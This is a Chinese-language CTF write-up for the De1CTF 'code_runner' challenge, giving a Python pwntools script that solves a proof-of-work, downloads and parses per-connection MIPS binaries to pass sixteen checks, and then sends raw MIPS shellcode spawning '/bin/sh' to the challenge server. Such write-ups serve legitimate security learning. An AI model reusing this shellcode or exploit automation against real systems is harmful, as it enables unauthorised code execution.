
CTF-De1CTF-code_runner-自动化挖掘

这次比赛遇到一个动态pwn,就记录一下自己的解法

爆破脚本

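def input_key():
    """Solve the server's proof-of-work: find the 3-byte string whose SHA-256 matches.

    Reads the target hex digest out of the prompt
    `hashlib.sha256(s).hexdigest() == "<hex>"`, enumerates all 256**3 candidates
    of three raw bytes (Python 2 str semantics: chr() yields one byte) and sends
    the first match back as a line. Returns as soon as the match is sent; if the
    whole space is exhausted it logs a failure instead of returning silently.

    Uses the module-level tube `sh` and pwntools `log`.
    """
    sh.recvuntil("hashlib.sha256(s).hexdigest() == \"")
    checkcode_result = sh.recvuntil("\"",drop=True)
    for i in range(256):
        for j in range(256):
            for k in range(256):
                candidate = chr(i) + chr(j) + chr(k)
                if hashlib.sha256(candidate).hexdigest() == checkcode_result:
                    sh.sendline(candidate)
                    # Explicit parentheses: `%` binds tighter than `+`, so the
                    # candidate must be formatted as a whole, not byte by byte.
                    log.success("key => %s" % (candidate,))
                    return
    log.failure("no 3-byte key matched %s" % checkcode_result)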

连接之后发现base64返回一个gz压缩包,然后解压之后就是elf,每次连接的elf的文件都是不一样的,所以大概就是要写一个自动挖掘机,在短时间pwn掉这个程序。

首先这个程序有16个check,要先全部通过;之后输入名字时直接输入空字符,即可跳出while循环。

然后输入一个shellcode即可

根据函数的头部来确定check函数地址,然后通过做差计算出每一个函数的size,然后通过size进行分组,每一个分组对应着一个解法,通过这个思路只要写出所有的size的应对策略就可以实现自动化挖掘。

本人封装了提取函数get_idx(data,pos,size)和get_opcode_arg(data,pos,size,opcode)

第一个函数可以找到mips汇编下的数组下标

第二个函数可以根据 MIPS 的 opcode 来获取该 opcode 的参数

通过下标和 opcode 的参数来确定方程的表达式,再用 sympy 求解;另有一部分较为固定的表达式可以直接预设一个固定值。

由于本人很懒,只写了几个size的策略,不过也足够了,通过5个终端爆破10分钟就可以有一个命中。

Exp如下

import base64
import hashlib
import os
import sys
import zlib

from sympy import *
from pwn import *
# Verbose pwntools tube logging (every send/recv is echoed).
context.update(log_level="DEBUG")
#sh = remote("106.53.114.216",9999)
# `flag` turns to 1 once main() has delivered its final payload; `sh` is the
# active pwntools tube and stays None until the __main__ section assigns one.
flag, sh = 0, None
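def input_key():
    """Solve the server's proof-of-work: find the 3-byte string whose SHA-256 matches.

    Reads the target hex digest out of the prompt
    `hashlib.sha256(s).hexdigest() == "<hex>"`, enumerates all 256**3 candidates
    of three raw bytes (Python 2 str semantics: chr() yields one byte) and sends
    the first match back as a line. Returns as soon as the match is sent; if the
    whole space is exhausted it logs a failure instead of returning silently.

    Uses the module-level tube `sh` and pwntools `log`.
    """
    sh.recvuntil("hashlib.sha256(s).hexdigest() == \"")
    checkcode_result = sh.recvuntil("\"",drop=True)
    for i in range(256):
        for j in range(256):
            for k in range(256):
                candidate = chr(i) + chr(j) + chr(k)
                if hashlib.sha256(candidate).hexdigest() == checkcode_result:
                    sh.sendline(candidate)
                    # Explicit parentheses: `%` binds tighter than `+`, so the
                    # candidate must be formatted as a whole, not byte by byte.
                    log.success("key => %s" % (candidate,))
                    return
    log.failure("no 3-byte key matched %s" % checkcode_result)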

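def get_binary():
    """Fetch this connection's challenge ELF from the server and store it as ./binary.

    Solves the proof-of-work first (input_key), then reads the base64 blob the
    server prints between the "===============" markers, decodes and gunzips it
    in-process and writes the result to ./binary with mode 0o755.

    The blob is untrusted remote input, so it is never interpolated into a shell
    command line: `echo %s | base64 -d` would let anything the server sends run
    as a local shell command on the player's machine.
    """
    input_key()
    sh.recvuntil("===============\n")
    data = sh.recvuntil("\n===============", True)
    log.success("dump => " + data)
    raw = base64.b64decode(data)
    # 16 + MAX_WBITS makes zlib expect a gzip header; available on Python 2 and 3.
    elf_bytes = zlib.decompress(raw, 16 + zlib.MAX_WBITS)
    with open("./binary", "wb") as fh:
        fh.write(elf_bytes)
    # Executable for the owner, readable for everyone; 0o777 is not needed.
    os.chmod("./binary", 0o755)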


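def find_check1_head(elf):
    """Return the boundary address just past the check functions.

    Searches the binary for a 24-byte MIPS prologue pattern and takes the first
    hit. find_check1_functions keeps only prologues below this address, and main
    uses it as the end of the highest-addressed check when slicing its code.

    Args:
        elf: a pwntools ELF object (only `.search` is used here).
    Returns:
        The first address where the pattern occurs.
    Raises:
        StopIteration: if the pattern is absent from the binary.
    """
    # Longer form of the same prologue as it appears in the disassembly, kept
    # for reference; only the first 24 bytes are searched for:
    # E0 FF BD 27 1C 00 BF AF 18 00 BE AF 25 F0 A0 03 20 00 C4 AF 20 00 C4 8F
    # B3 07 10 0C 00 00 00 00 25 E8 C0 03 1C 00 BF 8F 18 00 BE 8F 20 00 BD 27
    # 08 00 E0 03 00 00 00 00
    head = '\xE0\xFF\xBD\x27\x1C\x00\xBF\xAF\x18\x00\xBE\xAF\x25\xF0\xA0\x03\x20\x00\xC4\xAF\x20\x00\xc4\x8f'
    # next() instead of the Python-2-only generator.next() method.
    head_addr = next(elf.search(head))
    log.success("Find Head => %s" % hex(head_addr))
    return head_addr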


def find_check1_functions(elf,head_addr):
    """Collect the addresses of every function prologue that lies below head_addr.

    The 12-byte pattern looks like the standard MIPS `addiu $sp,-0x20; sw $ra;
    sw $fp` prologue shared by the generated check functions. Matches are taken
    in the order elf.search yields them and collection stops at the first match
    that is not below head_addr.

    Args:
        elf: a pwntools ELF object (only `.search` is used).
        head_addr: exclusive upper bound, as returned by find_check1_head.
    Returns:
        A list of start addresses, all < head_addr.
    """
    prologue = '\xE0\xFF\xBD\x27\x1C\x00\xBF\xAF\x18\x00\xBE\xAF'
    found = []
    for addr in elf.search(prologue):
        if addr >= head_addr:
            break
        found.append(addr)
    return found

def get_idx(data,pos,size):
    """Return the first byte in data[pos:pos+size] with value 1, 2 or 3, else 0.

    Used to recover a param_1[...] array index from a slice of MIPS code. The
    scan is byte-wise (every offset, not every 4-byte instruction); a '\\x00'
    byte never matches, so 0 doubles as the not-found result.

    Args:
        data: code bytes (a str under Python 2).
        pos: start offset into data.
        size: number of bytes to scan, clipped to the end of data.
    """
    window = data[pos:pos + size]
    for off in range(len(window)):
        unit = window[off:off + 1]
        if unit != '\x00' and ord(unit) < 4:
            return ord(unit)
    return 0

def get_opcode_arg(data,pos,size,opcode):
    """Return the 16-bit little-endian immediate of the first 4-byte window in
    data[pos:pos+size] whose upper two bytes equal `opcode`, or -1 if none does.

    The scan advances one byte at a time, so unaligned windows are matched too.
    Each window is data[pos+off:pos+off+4]; when fewer than 4 bytes remain the
    indexing raises IndexError rather than returning -1.

    Args:
        data: code bytes (a str under Python 2).
        pos: start offset into data.
        size: number of window starts to try, clipped to the end of data.
        opcode: 2-character str compared against bytes 2 and 3 of the window.
    """
    span = len(data[pos:pos + size])
    for off in range(span):
        word = data[pos + off:pos + off + 4]
        if word[2] + word[3] == opcode:
            return ord(word[0]) | (ord(word[1]) << 8)
    return -1

def hack(data):
    """Compute the 4-byte answer one check function expects, from its raw code bytes.

    Dispatches on len(data), i.e. the size of the check function as measured by
    the caller (distance to the next prologue); each size bucket corresponds to
    one generated equation pattern. Constants are taken from fixed offsets
    (written as absolute_address - function_start, apparently from one sample
    binary) or located with get_idx / get_opcode_arg. Sizes with no strategy
    fall through to four NUL bytes at the end.

    Args:
        data: code bytes of a single check function (a str under Python 2).
    Returns:
        A 4-character str, one byte per param_1[0..3].
    NOTE(review): several branches hand unreduced values to chr() (sympy
    solutions, a -1 left in buf_list, immediates above 0xff); chr() then raises
    ValueError, which the retry loop in __main__ catches.
    """
    size = len(data)
    # 0xb8: two bytes read straight from the function body, mirrored
    # (param_1[0] == param_1[2], param_1[1] == param_1[3]).
    if size == 0xb8:
        buf2 = data[0x00400BB8-0x00400B5C:][:1]
        buf1 = data[0x00400BD0-0x00400B5C:][:1]
        buf3 = buf1
        buf0 = buf2
        log.success("\tparam_1[0] => %s" % hex(ord(buf0)))
        log.success("\tparam_1[1] => %s" % hex(ord(buf1)))
        log.success("\tparam_1[2] => %s" % hex(ord(buf2)))
        log.success("\tparam_1[3] => %s" % hex(ord(buf3)))
        return buf0 + buf1 + buf2 + buf3
    # 0xcc: fixed all-zero answer. The triple-quoted block after the return is
    # unreachable; it preserves an abandoned sympy-based variant for this size.
    if size == 0xcc:
        log.success("\tparam_1 => %s %s %s %s" % (hex(0),hex(0),hex(0),hex(0)))
        return '\x00' * 4
        '''
if data[0x00400FF8 - 0x00400FE0:][:4] == '\x01\x00\x42\x24':
log.success("\ttype => 1")
tmp1 = ord(data[0x00401014 - 0x00400FE0][:1])
tmp2 = ord(data[0x00401040 - 0x00400FE0][:1])
tmp3 = ord(data[0x00401068 - 0x00400FE0][:1])
log.success("\ttmp1 => %s" % hex(tmp1))
log.success("\ttmp2 => %s" % hex(tmp2))
log.success("\ttmp3 => %s" % hex(tmp3))
i=Symbol('i')
j=Symbol('j')
k=Symbol('k')
l=Symbol('l')
answer = solve([j+k-tmp1,k-tmp2,k+l-tmp2,l+i-tmp3],[i,j,k,l])
log.success("\tparam_1[0] => %s" % hex(ord(chr(answer[i]))))
log.success("\tparam_1[1] => %s" % hex(ord(chr(answer[j]))))
log.success("\tparam_1[2] => %s" % hex(ord(chr(answer[k]))))
log.success("\tparam_1[3] => %s" % hex(ord(chr(answer[l]))))
return chr(answer[i]) + chr(answer[j]) + chr(answer[k]) + chr(answer[l])
else:
log.success("\ttype => 2")
tmp1 = ord(data[0x00400F44 - 0x00400F14][:1])
tmp2 = ord(data[0x00400F70 - 0x00400F14][:1])
tmp3 = ord(data[0x00400F9C - 0x00400F14][:1])
log.success("\ttmp1 => %s" % hex(tmp1))
log.success("\ttmp2 => %s" % hex(tmp2))
log.success("\ttmp3 => %s" % hex(tmp3))
i=Symbol('i')
j=Symbol('j')
k=Symbol('k')
l=Symbol('l')
answer = solve([i+j-tmp1,j-tmp2,j+k-tmp2,k+l-tmp3],[i,j,k,l])
log.success("\tparam_1[0] => %s" % hex(ord(chr(answer[i] % 0x100))))
log.success("\tparam_1[1] => %s" % hex(ord(chr(answer[j] % 0x100))))
log.success("\tparam_1[2] => %s" % hex(ord(chr(answer[k] % 0x100))))
log.success("\tparam_1[3] => %s" % hex(ord(chr(answer[l] % 0x100))))
return chr(answer[i] % 0x100) + chr(answer[j] % 0x100) + chr(answer[k] % 0x100) + chr(answer[l] % 0x100)
'''
    # 0x138: two bytes read from the body; the other two are their squares mod 0x100.
    if size == 0x138:
        buf0 = data[0x004013BC-0x004013A0:][:1]
        buf1 = data[0x004013D4-0x004013A0:][:1]
        buf2 = chr((ord(buf0) * ord(buf0)) % 0x100)
        buf3 = chr((ord(buf1) * ord(buf1)) % 0x100)
        log.success("\tbuf0 => %s" % hex(ord(buf0)))
        log.success("\tbuf1 => %s" % hex(ord(buf1)))
        log.success("\tparam_1[0] => %s" % hex(ord(buf0)))
        log.success("\tparam_1[1] => %s" % hex(ord(buf1)))
        log.success("\tparam_1[2] => %s" % hex(ord(buf2)))
        log.success("\tparam_1[3] => %s" % hex(ord(buf3)))
        return buf0 + buf1 + buf2 + buf3
    # 0xb4: six param_1 indices and two immediates. Slots idx5/idx6 take the
    # immediates directly; the pairs (idx1,idx2) and (idx3,idx4) are treated as
    # equal, so whichever member is already known is copied to the other.
    # NOTE(review): if a pair collapses onto the same slot, or both members are
    # still -1, a -1 can survive into chr() below and raise ValueError.
    if size == 0xb4:
        buf_list = [-1,-1,-1,-1]
        idx1 = get_idx(data,0x14,8)
        idx2 = get_idx(data,0x14 + 8 + 4,0x10 - 4)
        idx3 = get_idx(data,0x00400B8C-0x00400B5C,8)
        idx4 = get_idx(data,0x00400B8C-0x00400B5C + 8 + 4,8)
        idx5 = get_idx(data,0x00400B8C-0x00400B5C + 8 + 0x18,8)
        idx6 = get_idx(data,0x00400BC4-0x00400B5C-4,8 + 4)
        # '\x02\x24' is the upper half of a little-endian MIPS word, presumably
        # `addiu $v0, $zero, imm`; the immediate is the constant being compared.
        tmp1 = get_opcode_arg(data,0x00400BAC - 0x00400B5C+8,0x10,'\x02\x24')
        tmp2 = get_opcode_arg(data,0x00400BAC - 0x00400B5C+8 + 8,0x20,'\x02\x24')
        buf_list[idx5] = tmp1
        buf_list[idx6] = tmp2

        if buf_list[idx1] != -1:
            buf_list[idx2] = buf_list[idx1]
        else:
            buf_list[idx1] = buf_list[idx2]
        if buf_list[idx3] != -1:
            buf_list[idx4] = buf_list[idx3]
        else:
            buf_list[idx3] = buf_list[idx4]
        log.success("\tidx1 => %s" % hex(idx1))
        log.success("\tidx2 => %s" % hex(idx2))
        log.success("\tidx3 => %s" % hex(idx3))
        log.success("\tidx4 => %s" % hex(idx4))
        log.success("\tidx5 => %s" % hex(idx5))
        log.success("\tidx6 => %s" % hex(idx6))
        log.success("\ttmp1 => %s" % hex(tmp1))
        log.success("\ttmp2 => %s" % hex(tmp2))
        log.success("\tparam_1[0] => %s" % hex(buf_list[0]))
        log.success("\tparam_1[1] => %s" % hex(buf_list[1]))
        log.success("\tparam_1[2] => %s" % hex(buf_list[2]))
        log.success("\tparam_1[3] => %s" % hex(buf_list[3]))
        return chr(buf_list[0]) + chr(buf_list[1]) +chr(buf_list[2]) +chr(buf_list[3])
    # 0x108 / 0x110 / 0x104: two immediates tmp1, tmp2. The four bytes are a
    # chain of XORs of them; the three sizes differ only in which slot gets
    # which link of the chain.
    if size == 0x108:
        tmp1 = get_opcode_arg(data,0x00400DF8 - 0x00400DCC,8,'\x02\x24')
        tmp2 = get_opcode_arg(data,0x00400E10 - 0x00400DCC,8,'\x02\x24')

        buf1 = chr(tmp2)
        buf0 = chr(tmp2 ^ tmp1)
        # Mask to 7 bits before the shift so the result stays below 0x100.
        buf3 = chr(((ord(buf0) ^ ord(buf1))&0x7f)<<1)
        buf2 = chr(ord(buf3) ^ tmp1)
        log.success("\ttmp1 => %s" % hex(tmp1))
        log.success("\ttmp2 => %s" % hex(tmp2))

        log.success("\tparam_1[0] => %s" % hex(ord(buf0)))
        log.success("\tparam_1[1] => %s" % hex(ord(buf1)))
        log.success("\tparam_1[2] => %s" % hex(ord(buf2)))
        log.success("\tparam_1[3] => %s" % hex(ord(buf3)))
        return buf0 + buf1 + buf2 + buf3
    if size == 0x110:
        tmp1 = get_opcode_arg(data,0x00401A74 - 0x00401A44,8,'\x02\x24')
        tmp2 = get_opcode_arg(data,0x00401A8C - 0x00401A44,8,'\x02\x24')

        buf2 = chr(tmp2)
        buf1 = chr(tmp2 ^ tmp1)
        buf3 = chr(((ord(buf1) ^ ord(buf2))&0x7f)<<1)
        buf0 = chr(ord(buf3) ^ tmp1)
        log.success("\ttmp1 => %s" % hex(tmp1))
        log.success("\ttmp2 => %s" % hex(tmp2))

        log.success("\tparam_1[0] => %s" % hex(ord(buf0)))
        log.success("\tparam_1[1] => %s" % hex(ord(buf1)))
        log.success("\tparam_1[2] => %s" % hex(ord(buf2)))
        log.success("\tparam_1[3] => %s" % hex(ord(buf3)))
        return buf0 + buf1 + buf2 + buf3
    if size == 0x104:
        tmp1 = get_opcode_arg(data,0x004010FC - 0x004010D0,8,'\x02\x24')
        tmp2 = get_opcode_arg(data,0x00401110 - 0x004010D0,8,'\x02\x24')
        buf0 = chr(tmp2)
        buf3 = chr(tmp2 ^ tmp1)
        buf1 = chr(((ord(buf3) ^ ord(buf0))&0x7f)<<1)
        buf2 = chr(ord(buf1) ^ tmp1)
        log.success("\ttmp1 => %s" % hex(tmp1))
        log.success("\ttmp2 => %s" % hex(tmp2))
        log.success("\tparam_1[0] => %s" % hex(ord(buf0)))
        log.success("\tparam_1[1] => %s" % hex(ord(buf1)))
        log.success("\tparam_1[2] => %s" % hex(ord(buf2)))
        log.success("\tparam_1[3] => %s" % hex(ord(buf3)))
        return buf0 + buf1 + buf2 + buf3
    # 0xc8: fixed all-zero answer. The triple-quoted block after the return is
    # unreachable; it preserves an abandoned index-based variant for this size.
    if size == 0xc8:
        log.success("\tparam_1 => %s %s %s %s" % (hex(0),hex(0),hex(0),hex(0)))
        return '\x00' * 4
        '''
idx_list = []
idx_list.append(get_idx(data,0x00400CDC - 0x00400CC8,8))
idx_list.append(get_idx(data,0x0040148C - 0x00401468,8))
idx_list.append(get_idx(data,0x004014A8 - 0x00401468,8))
idx_list.append(get_idx(data,0x00400D10 - 0x00400CC8,8))
idx_list.append(get_idx(data,0x00400D2C - 0x00400CC8,8))
idx_list.append(get_idx(data,0x00400D3C - 0x00400CC8,8))
tmp1 = get_opcode_arg(data,0x00400CF4 - 0x00400CC8,0x10,'\x02\x24')
tmp2 = get_opcode_arg(data,0x00400D20 - 0x00400CC8,0x10,'\x02\x24')
tmp3 = get_opcode_arg(data,0x00400D4C - 0x00400CC8,0x10,'\x02\x24')
log.success("\ttmp1 => %s" % hex(tmp1))
log.success("\ttmp2 => %s" % hex(tmp2))
log.success("\ttmp3 => %s" % hex(tmp3))

buf_list = [-1,-1,-1,-1]
buf_list[idx_list[1]] = tmp2;
buf_list[idx_list[0]] = tmp1 - tmp2;
buf_list[idx_list[3]] = 0;
buf_list[idx_list[5]] = tmp3;

print idx_list
log.success("\tparam_1[0] => %s" % hex(buf_list[0]))
log.success("\tparam_1[1] => %s" % hex(buf_list[1]))
log.success("\tparam_1[2] => %s" % hex(buf_list[2]))
log.success("\tparam_1[3] => %s" % hex(buf_list[3]))

return chr(buf_list[0]) + chr(buf_list[1]) + chr(buf_list[2]) + chr(buf_list[3])
'''


    # 0x130: four immediates, each the sum of three of the four unknowns. Which
    # three is fixed by the single index found at the start, so the four
    # rotations of the system are enumerated and solved with sympy.
    # NOTE(review): the solutions are used unreduced (no % 0x100); chr() raises
    # ValueError if a solved value falls outside 0..255.
    if size == 0x130:
        idx_list = []
        buf_list = [-1,-1,-1,-1]
        idx_list.append(get_idx(data,0x00400B70 - 0x00400B5C,8))
        tmp1 = get_opcode_arg(data,0x004012C8 - 0x00401288,0x10,'\x02\x24')
        tmp2 = get_opcode_arg(data,0x00401300 - 0x00401288,0x10,'\x02\x24')
        tmp3 = get_opcode_arg(data,0x00401338 - 0x00401288,0x10,'\x02\x24')
        tmp4 = get_opcode_arg(data,0x00401370 - 0x00401288,0x10,'\x02\x24')
        i=Symbol('i')
        j=Symbol('j')
        k=Symbol('k')
        l=Symbol('l')
        # get_idx only ever returns 0..3, so exactly one branch below runs.
        if idx_list[0] == 1:
            answer = solve([j+k+l-tmp1,k+l+i-tmp2,l+i+j-tmp3,i+j+k-tmp4],[i,j,k,l])
            buf_list[0] = answer[i]
            buf_list[1] = answer[j]
            buf_list[2] = answer[k]
            buf_list[3] = answer[l]
        elif idx_list[0] == 0:
            answer = solve([i+j+k-tmp1,j+k+l-tmp2,k+l+i-tmp3,l+i+j-tmp4],[i,j,k,l])
            buf_list[0] = answer[i]
            buf_list[1] = answer[j]
            buf_list[2] = answer[k]
            buf_list[3] = answer[l]
        elif idx_list[0] == 2:
            answer = solve([k+l+i-tmp1,l+i+j-tmp2,i+j+k-tmp3,j+k+l-tmp4],[i,j,k,l])
            buf_list[0] = answer[i]
            buf_list[1] = answer[j]
            buf_list[2] = answer[k]
            buf_list[3] = answer[l]
        elif idx_list[0] == 3:
            answer = solve([l+i+j-tmp1,i+j+k-tmp2,j+k+l-tmp3,k+l+i-tmp4],[i,j,k,l])
            buf_list[0] = answer[i]
            buf_list[1] = answer[j]
            buf_list[2] = answer[k]
            buf_list[3] = answer[l]

        # Python 2 print statement (the whole script is Python 2).
        print answer


        log.success("\ttmp1 => %s" % hex(tmp1))
        log.success("\ttmp2 => %s" % hex(tmp2))
        log.success("\ttmp3 => %s" % hex(tmp3))
        log.success("\ttmp4 => %s" % hex(tmp4))

        log.success("\tparam_1[0] => %s" % hex(ord(chr(buf_list[0]))))
        log.success("\tparam_1[1] => %s" % hex(ord(chr(buf_list[1]))))
        log.success("\tparam_1[2] => %s" % hex(ord(chr(buf_list[2]))))
        log.success("\tparam_1[3] => %s" % hex(ord(chr(buf_list[3]))))
        return chr(buf_list[0]) + chr(buf_list[1]) + chr(buf_list[2]) + chr(buf_list[3])
    # 0x1bc: probing for a branch encoding ('\x40\x10' upper half) selects one of
    # two fixed answers.
    # NOTE(review): the else-branch logs 01 03 00 00 but returns '\x03\x01\x00\x00';
    # the returned bytes are what is sent, so the log line is the one to double-check.
    if size == 0x1bc:
        tmp1 = get_opcode_arg(data,0x00401894 - 0x004017D4,0x10,'\x40\x10')
        if tmp1 != -1:
            log.success("\tparam_1[0] => %s" % hex(0x0))
            log.success("\tparam_1[1] => %s" % hex(0x0))
            log.success("\tparam_1[2] => %s" % hex(0x1))
            log.success("\tparam_1[3] => %s" % hex(0x3))
            return '\x00\x00\x01\x03'
        else:
            log.success("\tparam_1[0] => %s" % hex(0x01))
            log.success("\tparam_1[1] => %s" % hex(0x03))
            log.success("\tparam_1[2] => %s" % hex(0x00))
            log.success("\tparam_1[3] => %s" % hex(0x00))
            return '\x03\x01\x00\x00'

    # 0x148: three indices and two immediates. Slot idx2 gets tmp1^2 mod 0x100
    # and the one slot not named by any index is filled so that
    # tmp2^2 + buf[idx2]^2 - tmp1^2 (mod 0x100) holds.
    if size == 0x148:
        idx_list = []
        idx_list.append(get_idx(data,0x00400ED0 - 0x00400EC0,0x10))
        idx_list.append(get_idx(data,0x00400EEC - 0x00400EC0,0x10))
        idx_list.append(get_idx(data,0x00400F04 - 0x00400EC0,0x10))
        tmp1 = get_opcode_arg(data,0x00400EDC - 0x00400EC0,0x10,'\x02\x24')
        tmp2 = get_opcode_arg(data,0x00400EF8 - 0x00400EC0,0x10,'\x02\x24')
        log.success("\ttmp1 => %s" % hex(tmp1))
        log.success("\ttmp2 => %s" % hex(tmp2))
        print idx_list
        buf_list = [-1,-1,-1,-1]
        buf_list[idx_list[0]] = tmp1
        buf_list[idx_list[1]] = tmp2
        buf_list[idx_list[2]] = (tmp1 * tmp1) % 0x100
        for i in [0,1,2,3]:
            if i not in idx_list:
                buf_list[i] = (tmp2 * tmp2 + buf_list[idx_list[2]] * buf_list[idx_list[2]] - tmp1 * tmp1) % 0x100
                break
        log.success("\tparam_1[0] => %s" % hex(ord(chr(buf_list[0]))))
        log.success("\tparam_1[1] => %s" % hex(ord(chr(buf_list[1]))))
        log.success("\tparam_1[2] => %s" % hex(ord(chr(buf_list[2]))))
        log.success("\tparam_1[3] => %s" % hex(ord(chr(buf_list[3]))))
        return chr(buf_list[0]) + chr(buf_list[1]) + chr(buf_list[2]) + chr(buf_list[3])
    # 0x140: same relation as 0x148 with a different layout.
    # NOTE(review): idx_list[1] is read at 0x00400EEC - 0x00400EC0, the same
    # offset the 0x148 case uses, while the other two are relative to
    # 0x00401838 — looks copied over; confirm it is intentional.
    if size == 0x140:
        idx_list = []
        idx_list.append(get_idx(data,0x0040184C - 0x00401838,0x10))
        idx_list.append(get_idx(data,0x00400EEC - 0x00400EC0,0x8))
        idx_list.append(get_idx(data,0x00401874 - 0x00401838,0x10))
        tmp1 = get_opcode_arg(data,0x00401854 - 0x00401838,0x10,'\x02\x24')
        tmp2 = get_opcode_arg(data,0x00401868 - 0x00401838,0x10,'\x02\x24')
        log.success("\ttmp1 => %s" % hex(tmp1))
        log.success("\ttmp2 => %s" % hex(tmp2))
        print idx_list
        buf_list = [-1,-1,-1,-1]
        buf_list[idx_list[0]] = tmp1
        buf_list[idx_list[1]] = tmp2
        buf_list[idx_list[2]] = (tmp1 * tmp1) % 0x100
        for i in [0,1,2,3]:
            if i not in idx_list:
                buf_list[i] = (tmp2 * tmp2 + buf_list[idx_list[2]] * buf_list[idx_list[2]] - tmp1 * tmp1) % 0x100
                break
        log.success("\tparam_1[0] => %s" % hex(ord(chr(buf_list[0]))))
        log.success("\tparam_1[1] => %s" % hex(ord(chr(buf_list[1]))))
        log.success("\tparam_1[2] => %s" % hex(ord(chr(buf_list[2]))))
        log.success("\tparam_1[3] => %s" % hex(ord(chr(buf_list[3]))))

        return chr(buf_list[0]) + chr(buf_list[1]) + chr(buf_list[2]) + chr(buf_list[3])

    # No strategy for this size: fall back to four NUL bytes.
    return '\x00' * 4

def main():
    """Answer every check in the binary, then drive the session to its final stage.

    Loads ./binary (or argv[1]), locates the check functions by prologue, sizes
    each one from the gap to the next prologue (the highest-addressed one is
    sized against head_addr), feeds each code slice to hack() and concatenates
    the 4-byte answers. Expects the module-level tube `sh` to be connected and
    the "Faster > " prompt to be pending. Sets the module-level `flag` to 1 once
    the last payload has been sent so the __main__ retry loop stops.
    """
    global flag
    if len(sys.argv) > 1:
        elf = ELF(sys.argv[1])
    else:
        elf = ELF("./binary")
    payload = ''
    head_addr = find_check1_head(elf)
    check1_function_list = find_check1_functions(elf,head_addr)
    # Reversed so that each entry's end is the previous entry's start; the
    # first entry ends at head_addr.
    check1_function_list.reverse()
    for i in range(0,len(check1_function_list)):
        log.success("check%d => %s" % (i+1,hex(check1_function_list[i])))
    for i in range(0,len(check1_function_list)):
        if i == 0:
            code_data = elf.read(check1_function_list[i],head_addr - check1_function_list[i])
            log.success("check%d code size => %s" % (i+1,hex(head_addr - check1_function_list[i])))
        else:
            code_data = elf.read(check1_function_list[i],check1_function_list[i-1] - check1_function_list[i])
            log.success("check%d code size => %s" % (i+1,hex(check1_function_list[i-1] - check1_function_list[i])))
        # hack() returns 4 bytes per check; the answers are sent as one line.
        payload += hack(code_data)
    #log.success("pid => %s" % sh.pid)
    #pause()

    sh.sendlineafter('Faster > \n',payload)
    sh.recvuntil(">")
    # Name prompt: per the writeup an empty name leaves the name loop; the
    # leading NUL presumably terminates the string, the rest is not used here.
    sh.sendline("\x00XYNM")
    sh.recvuntil("Your time comes.\n>")

    # Final stage: raw MIPS little-endian payload ending in the "/bin/sh" string,
    # bytes as given in the writeup.
    payload = "\xff\xff\x06\x28"
    payload += "\xff\xff\xd0\x04"
    payload += "\xff\xff\x05\x28"
    payload += "\x01\x10\xe4\x27"
    payload += "\x0f\xf0\x84\x24"
    payload += "\xab\x0f\x02\x24"
    payload += "\x0c\x01\x01\x01"
    payload += "/bin/sh\x00"

    sh.sendline(payload)
    flag = 1
    sh.interactive()

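if __name__ == "__main__":
    # Local-debugging variants kept from the original script (disabled):
    # sh = process(["qemu-mipsel", "-g", "2333", "-L", "/usr/mipsel-linux-gnu/", "./binary"])
    # sh = process(["qemu-mipsel", "-L", "/usr/mipsel-linux-gnu/", "./binary"])
    # sh = remote("106.53.114.216",9999)
    # if len(sys.argv) == 1:
    #     get_binary()
    # main()

    # Each connection serves a freshly generated binary, so keep reconnecting
    # until hack() has a strategy for every check of one instance (flag == 1).
    # `sh` starts out as None at module level; connect here rather than relying
    # on an except handler, where sh.close() on None would itself raise.
    if sh is None:
        sh = remote("106.53.114.216",9999)
    while 1:
        try:
            if flag == 1:
                break
            if len(sys.argv) == 1:
                get_binary()
            main()
        except KeyboardInterrupt:
            break
        except Exception as exc:
            # EOFError (the server dropped the connection) and any failure inside
            # hack() (e.g. chr() on an out-of-range value) both mean: discard this
            # instance and fetch a new one. Logged instead of swallowed silently;
            # SystemExit and friends are no longer caught.
            log.warning("instance failed (%r), reconnecting" % (exc,))
            sh.close()
            sh = remote("106.53.114.216",9999)
            continue
        else:
            break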

运行一段时间之后就可以得到flag

De1ctf{9d94bc3d3f57f1b33aee728b5d32d6d473df8df3}

文章作者: 咲夜南梦
文章链接: http://yoursite.com/2020/05/03/CTF-De1CTF-code_runner-%E8%87%AA%E5%8A%A8%E5%8C%96%E6%8C%96%E6%8E%98/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 咲夜南梦's 博客